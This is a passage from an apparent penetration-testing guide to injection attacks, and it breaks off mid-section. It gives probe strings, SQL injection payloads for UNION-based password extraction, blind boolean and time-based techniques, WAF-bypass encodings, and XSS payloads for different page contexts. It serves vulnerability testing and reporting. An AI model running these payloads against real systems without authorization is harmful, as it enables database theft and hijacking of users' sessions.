Injection Attacks

How to tell the difference: change your input and observe whether the BEHAVIOR of the response changes, not just the appearance. If you send 7*7 and see 49 in the output, that is injection - the server evaluated your expression. If you send 7*7 and see 7*7 echoed back, that is reflection - it just displayed what you sent.

The rule: if only the echoed text changes, it is reflection. If status codes change, different data is returned, response timing shifts, or a side effect occurs (file created, email sent, record modified), it is injection. Reflection alone is not a vulnerability unless it leads to XSS in a browser context. Injection is almost always reportable.

Do not confuse reflected XSS with "reflection" - reflected XSS is injection into the browser's HTML parser, which controls execution of JavaScript in the victim's session. That is real injection.

Phase 0: Context Identification (Do This First)

Before testing any specific injection class, determine which injection context(s) are present. Each has distinct signals.

Visual Signals

Network Signals (Check These in the Browser Dev Tools / Burp)

The 3 Probe Sequence (Run Before Any Full Attack)

Send these three probes to every injection-suspect parameter before committing to an attack class. Read the responses carefully - they tell you what context you are in.

Probe 1 - Polyglot context breaker:

'"<svg/onload=1>{{7*7}}${7*7};--

• If the number 49 appears → template injection (SSTI)
• If <svg is reflected unescaped → HTML context, XSS possible
• If you get a SQL error → SQL context
• If the response changes vs sending clean input → something is being processed

Probe 2 - Mathematical evaluation:

{{7*7}}
${7*7}

• 49 in response → confirm SSTI, identify engine next
• No change → either escaped or not a template context

Probe 3 - Time delay (blind confirmation):

' AND SLEEP(5)--
; sleep 5 ;

• 5-second delay → blind SQL or command injection confirmed
• No delay → either not injectable or different DB/OS

Only after these probes do you know which attack section below to focus on. Don't brute-force all classes - the probes tell you where to spend time.

SQL Injection

When to Test

• Error messages visible? -> Error-based extraction first (UNION or extractvalue)
• Different response content for true/false? -> Boolean-based blind
• No visible difference? -> Time-based blind (SLEEP), then OOB (see @blind-injection)
• WAF blocking? -> Encoding bypass section below, then retry
• Stacked queries allowed? -> Direct command execution via xp_cmdshell (MSSQL) or COPY (PostgreSQL)

Context Identification

Signals that you are in an SQL injection context:

• Input appears in a data retrieval parameter (id=, user=, search=, category=, order=)
• Adding ' causes a database error in the response (syntax error, unterminated string, ORA-, MySQL, PostgreSQL, MSSQL)
• Removing special characters makes the error disappear
• Adding ' AND 1=1-- returns the same result as the clean request
• Adding ' AND 1=2-- returns an empty result or different page

Less obvious SQLi surfaces:

• HTTP headers: User-Agent, X-Forwarded-For, Referer, Cookie values stored in DB
• JSON body fields, especially filter/sort parameters
• GraphQL variables, particularly string filters
• Order-by clauses (numeric injection, not quoted: ORDER BY 1, ORDER BY 1+1)
• XML/SOAP fields passed to a backend query

Response Interpretation

Decision Framework

1. Send ' - error? → classic SQLi. Send ' AND 1=1-- and ' AND 1=2-- to confirm boolean response difference.
2. If no visible error: send ' AND SLEEP(5)-- (MySQL) and '; WAITFOR DELAY '0:0:5'-- (MSSQL) - delay? → blind time-based.
3. If error is visible with full output: try UNION - find column count with ORDER BY N, then extract.

Detection

' " ` ) ; -- /* */
' OR '1'='1
' AND '1'='2
' WAITFOR DELAY '0:0:5'--
' AND SLEEP(5)--

UNION-Based SQLi

-- Find column count
' ORDER BY 1--
' ORDER BY 5--   -- Increment until error

-- Find display columns
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,2,3--

-- Extract data
' UNION SELECT username,password,3 FROM users--
' UNION SELECT table_name,column_name,3 FROM information_schema.columns--

Blind Boolean-Based

-- True condition (normal response)
' AND 1=1--

-- False condition (different response)
' AND 1=2--

-- Extract data character by character
' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a'--

Blind Time-Based

-- MySQL
' AND SLEEP(5)--
' AND IF(1=1,SLEEP(5),0)--

-- PostgreSQL
'; SELECT pg_sleep(5)--

-- MSSQL
'; WAITFOR DELAY '0:0:5'--

-- Oracle
' AND DBMS_PIPE.RECEIVE_MESSAGE('x',5)='x'--

WAF Bypass

-- Case variation
SeLeCt, sElEcT

-- Comments
SEL/**/ECT, SE/*comment*/LECT

-- URL encoding
%53%45%4c%45%43%54

-- Double encoding
%2553%2545%254c%2545%2543%2554

-- Alternative syntax
1 aNd 1=1, 1 && 1=1

-- Null bytes
SEL%00ECT

Cross-Site Scripting (XSS)

When to Test

• Input reflected in HTML body? -> HTML context payloads (script, svg, img tags)
• Input in attribute value? -> Attribute breakout payloads (close quote, add event handler)
• Input in JavaScript string? -> JS context payloads (break string, inject expression)
• Input in URL parameter reflected in page? -> URL context payloads (javascript: scheme)
• Input stored and shown to other users? -> Stored XSS, or blind XSS (see @blind-injection)

Context Identification

How to identify which XSS context you are in:

View page source (not DevTools rendered view - raw source) after submitting your input. Find where your input lands.

Reflection fidelity check - before sending any payload, send: xsstest123"'<>

• If all characters appear verbatim → unfiltered, inject freely
• If " is escaped to " → likely HTML-context escaping, but check JS context separately
• If < is escaped to < → HTML encoding in place - look for JS-context reflection instead
• If nothing is escaped → check if there's a CSP that would block execution

Response Interpretation

Decision Framework

1. Send xsstest123"'<> - check raw source to find all reflection points and which characters survive.
2. Based on context: try the appropriate context-specific payload (see below). Use the simplest payload first (<svg onload=alert(1)> for HTML, ';alert(1)// for JS).
3. If payload is filtered: identify what specific character or keyword is blocked, then apply the minimum bypass needed - don't jump to a complex polyglot when a simple case variant works.

Contexts & Payloads

HTML context:

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>

Attribute context:

" onmouseover=alert(1) x="
' onfocus=alert(1) autofocus='
" autofocus onfocus=alert(1) x="

JavaScript context:

';alert(1)//
\';alert(1)//
</script><script>alert(1)</script>

URL context: